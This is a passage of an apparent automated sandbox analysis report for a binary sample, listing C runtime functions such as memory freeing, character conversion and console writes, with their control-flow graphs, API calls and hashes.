                                                                                                                                                                                                                                                          • Instruction ID: dc7a58b89b61a7cd2bf07843c0399bcf46f8539aa6243bf961939f8453b72764
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c20aff9c3f31a2a5acd5f19455da59379b0c4cfa96a976b91d7f07df4435a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4314B71600604DFEB60AB7AE846B9AB7E8EF50310F1448BAF45AD7191DF38ED40CB60
                                                                                                                                                                                                                                                          Function 00B64330 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 138 b64330-b64341 139 b64343-b6434c call b64869 138->139 140 b6434d-b643d8 call b64869 * 9 call b641f6 call b64246 138->140 139->140
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64344
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64350
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6435B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64366
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64371
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6437C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64387
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64392
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6439D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B643AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 5a2f5de688e3072a9a3f6c608ddfcd0d4610201899b2062dda042b6a1f929143
                                                                                                                                                                                                                                                          • Instruction ID: e07964c54e6588d0192e71b8ff47f426d828e61d8f3fce8e78827b5a68e5050a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2f5de688e3072a9a3f6c608ddfcd0d4610201899b2062dda042b6a1f929143
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3117476610548EFCB41EF96D842CD93BA5EF44750F5141A6BA088F262DB35DE509B80
                                                                                                                                                                                                                                                          Function 00B67AB4 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 165 b67ab4-b67acd 166 b67ae3-b67ae8 165->166 167 b67acf-b67adf call b682cc 165->167 169 b67af5-b67b19 MultiByteToWideChar 166->169 170 b67aea-b67af2 166->170 167->166 174 b67ae1 167->174 172 b67b1f-b67b2b 169->172 173 b67cac-b67cbf call b6123a 169->173 170->169 175 b67b7f 172->175 176 b67b2d-b67b3e 172->176 174->166 178 b67b81-b67b83 175->178 179 b67b40-b67b4f call b6ac20 176->179 180 b67b5d-b67b63 176->180 183 b67ca1 178->183 184 b67b89-b67b9c MultiByteToWideChar 178->184 179->183 190 b67b55-b67b5b 179->190 182 b67b64 call b662ff 180->182 186 b67b69-b67b6e 182->186 188 b67ca3-b67caa call b6646a 183->188 184->183 187 b67ba2-b67bbd call b65a15 184->187 186->183 191 b67b74 186->191 187->183 197 b67bc3-b67bca 187->197 188->173 194 b67b7a-b67b7d 190->194 191->194 194->178 198 b67c04-b67c10 197->198 199 b67bcc-b67bd1 197->199 200 b67c12-b67c23 198->200 201 b67c5c 198->201 199->188 202 b67bd7-b67bd9 199->202 203 b67c25-b67c34 call b6ac20 200->203 204 b67c3e-b67c44 200->204 205 b67c5e-b67c60 201->205 202->183 206 b67bdf-b67bf9 call b65a15 202->206 208 b67c9a-b67ca0 call b6646a 203->208 220 b67c36-b67c3c 203->220 211 b67c45 call b662ff 204->211 207 b67c62-b67c7b call b65a15 205->207 205->208 206->188 218 b67bff 206->218 207->208 222 b67c7d-b67c84 207->222 208->183 216 b67c4a-b67c4f 211->216 216->208 221 b67c51 216->221 218->183 223 b67c57-b67c5a 220->223 221->223 224 b67c86-b67c87 222->224 225 b67cc0-b67cc6 222->225 223->205 226 b67c88-b67c98 WideCharToMultiByte 224->226 225->226 226->208 227 b67cc8-b67ccf call b6646a 226->227 227->188
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00B654C8,00000000,?,?,?,00B67D05,?,?,00000100), ref: 00B67B0E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B67B46
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00B67D05,?,?,00000100,5EFC4D8B,?,?), ref: 00B67B94
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B67C2B
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B67C8E
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67C9B
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67CA4
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67CC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                                          • Opcode ID: e2078988a1d8f367522d0ef911eeb63067f6ed35200e12954fc017c36a19a7be
                                                                                                                                                                                                                                                          • Instruction ID: 72ba268eb0d0237529305f777c69793e902787f8a6bb2ea07f3f9a41be1eaddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2078988a1d8f367522d0ef911eeb63067f6ed35200e12954fc017c36a19a7be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF51DF72654216ABEB258F64CC91EAF77EAEB84758F1546A8FC04D6140EF38DC80D6A0
                                                                                                                                                                                                                                                          Function 00B68417 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 230 b68417-b68474 GetConsoleCP 231 b685b7-b685c9 call b6123a 230->231 232 b6847a-b68496 230->232 234 b684b1-b684c2 call b66052 232->234 235 b68498-b684af 232->235 241 b684c4-b684c7 234->241 242 b684e8-b684ea 234->242 237 b684eb-b684fa call b672b7 235->237 237->231 246 b68500-b68520 WideCharToMultiByte 237->246 244 b6858e-b685ad 241->244 245 b684cd-b684df call b672b7 241->245 242->237 244->231 245->231 252 b684e5-b684e6 245->252 246->231 248 b68526-b6853c WriteFile 246->248 250 b6853e-b6854f 248->250 251 b685af-b685b5 GetLastError 248->251 250->231 253 b68551-b68555 250->253 251->231 252->246 254 b68557-b68575 WriteFile 253->254 255 b68583-b68586 253->255 254->251 257 b68577-b6857b 254->257 255->232 256 b6858c 255->256 256->231 257->231 258 b6857d-b68580 257->258 258->255
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B68B8C,?,00000000,?,00000000,00000000), ref: 00B68459
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00B684D4
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00B684EF
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B68515
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00B68B8C,00000000,?,?,?,?,?,?,?,?,?,00B68B8C,?), ref: 00B68534
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00B68B8C,00000000,?,?,?,?,?,?,?,?,?,00B68B8C,?), ref: 00B6856D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: 04267ff3652b3def17fea4d04b6561271629923f063b1cee9c6266c08b97e625
                                                                                                                                                                                                                                                          • Instruction ID: f7b43b9757df3aabe606ed4863a4ebc7eb63451b3826f9f99ad2fce41856a7c2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04267ff3652b3def17fea4d04b6561271629923f063b1cee9c6266c08b97e625
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F51B470A002499FDB10CFA8DC95AEEBBF8FF19300F14465AE956E7291DB749941CF60
                                                                                                                                                                                                                                                          Function 00B61E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 259 b61e00-b61e51 call b6ac80 call b61dc0 call b62377 266 b61e53-b61e65 259->266 267 b61ead-b61eb0 259->267 268 b61e67-b61e7e 266->268 269 b61ed0-b61ed9 266->269 267->269 270 b61eb2-b61ebf call b62360 267->270 271 b61e94 268->271 272 b61e80-b61e8e call b62300 268->272 276 b61ec4-b61ecd call b61dc0 270->276 275 b61e97-b61e9c 271->275 281 b61ea4-b61eab 272->281 282 b61e90 272->282 275->268 279 b61e9e-b61ea0 275->279 276->269 279->269 283 b61ea2 279->283 281->276 284 b61e92 282->284 285 b61eda-b61ee3 282->285 283->276 284->275 286 b61ee5-b61eec 285->286 287 b61f1d-b61f2d call b62340 285->287 286->287 288 b61eee-b61efd call b6aac0 286->288 292 b61f41-b61f5d call b61dc0 call b62320 287->292 293 b61f2f-b61f3e call b62360 287->293 297 b61eff-b61f17 288->297 298 b61f1a 288->298 293->292 297->298 298->287
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61E37
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B61E3F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61EC8
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00B61EF3
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61F48
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: e7f30bbc3e0cc8c0c5afbf75f3d58855a9eabff858196f8e3ce73b2250909050
                                                                                                                                                                                                                                                          • Instruction ID: d2d4f7e5204874fa7c4c07c0b3f4866b7e304fc0685caae150a8a5d231801be0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f30bbc3e0cc8c0c5afbf75f3d58855a9eabff858196f8e3ce73b2250909050
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E418134A00208ABCF10DF6CC885A9EBBF5FF45354F1888D5E819AB392D73AD945CB91
                                                                                                                                                                                                                                                          Function 00B6621B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 305 b6621b-b66226 306 b662fc-b662fe 305->306 307 b6622c-b662f9 call b661df * 5 call b64869 * 3 call b661df * 5 call b64869 * 4 305->307 307->306
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00B661DF: _free.LIBCMT ref: 00B66208
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66269
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66274
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6627F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662D3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662DE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662E9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662F4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction ID: 9a46592c195d55423195785a3011537ad13a2fb9b253f2c1e1cc56c978c31f4d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9115E71541B14EAD620BBB1CC07FCB77DCAF81700F404865B6AAB6093EB7DBE048690
                                                                                                                                                                                                                                                          Function 00B623D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 342 b623d1-b623d8 343 b623dd-b623f8 GetLastError call b626a4 342->343 344 b623da-b623dc 342->344 347 b62411-b62413 343->347 348 b623fa-b623fc 343->348 349 b62457-b62462 SetLastError 347->349 348->349 350 b623fe-b6240f call b626df 348->350 350->347 353 b62415-b62425 call b63f67 350->353 356 b62427-b62437 call b626df 353->356 357 b62439-b62449 call b626df 353->357 356->357 362 b6244b-b6244d 356->362 363 b6244f-b62456 call b63ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B623C8,00B6209F,00B61AFC), ref: 00B623DF
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B623ED
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B62406
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00B623C8,00B6209F,00B61AFC), ref: 00B62458
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: ff2892ae21c298996cdedf83b98a22099581218a2784ced1c49fba8e290833e9
                                                                                                                                                                                                                                                          • Instruction ID: 787ca5d575ca8956f0b15fd39a931f3e4245b2526b5bd4fe411609dccd81fddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2892ae21c298996cdedf83b98a22099581218a2784ced1c49fba8e290833e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F101F73310AB155EFA2427BCBC85A2B2BD4EB017B472006B9FA24862E4EF594CC19260
                                                                                                                                                                                                                                                          Function 00B64424 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 366 b64424-b64438 GetLastError 367 b64446-b6444b 366->367 368 b6443a-b64444 call b65904 366->368 370 b6444d call b6480c 367->370 368->367 373 b6448f-b6449a SetLastError 368->373 372 b64452-b64458 370->372 374 b64463-b64471 call b6595a 372->374 375 b6445a 372->375 381 b64476-b6448d call b64296 call b64869 374->381 382 b64473-b64474 374->382 376 b6445b-b64461 call b64869 375->376 383 b6449b-b644a7 SetLastError call b63f24 376->383 381->373 381->383 382->376
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00B66D69,?,?,?,00B704C8,0000002C,00B63F34,00000016,00B6209F,00B61AFC), ref: 00B64428
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6445B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64483
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00B64490
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00B6449C
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00B644A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                          • Opcode ID: 30697f83f6df0076efe4ca41b967a418c53f9aa1fc371a5cc4b22f836eeeaa10
                                                                                                                                                                                                                                                          • Instruction ID: 399a0a44a9424df8171bd4fce79f9527b42bc1abe8d0c98a3f45ad2e0b47911f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30697f83f6df0076efe4ca41b967a418c53f9aa1fc371a5cc4b22f836eeeaa10
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F0C832504E40A6C6227739AC5BF2B27EAEBC1771F2445A4F62CD33D1EF6C89414130
                                                                                                                                                                                                                                                          Function 00B636FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 390 b636fc-b63724 GetModuleHandleExW 391 b63726-b63739 GetProcAddress 390->391 392 b63749-b6374d 390->392 393 b6373b-b63746 391->393 394 b63748 391->394 395 b6374f-b63752 FreeLibrary 392->395 396 b63758-b63765 call b6123a 392->396 393->394 394->392 395->396
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B636AD,?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002), ref: 00B6371C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B6372F
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B636AD,?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000), ref: 00B63752
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: fe57c0bb66c8e33c5223c80e6974cfa603483ee255f93fd560c5fa8dd8d498c9
                                                                                                                                                                                                                                                          • Instruction ID: a86d7c9d0fe962ae691653e41720c7a9dbd4b5e9ae32c1744d45c3c886d18ec8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe57c0bb66c8e33c5223c80e6974cfa603483ee255f93fd560c5fa8dd8d498c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F03171A00218BBCB115B94DC59FAEBFF4EF04B51F0440A5E905E61A1DF785E84CA90
                                                                                                                                                                                                                                                          Function 00B6634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
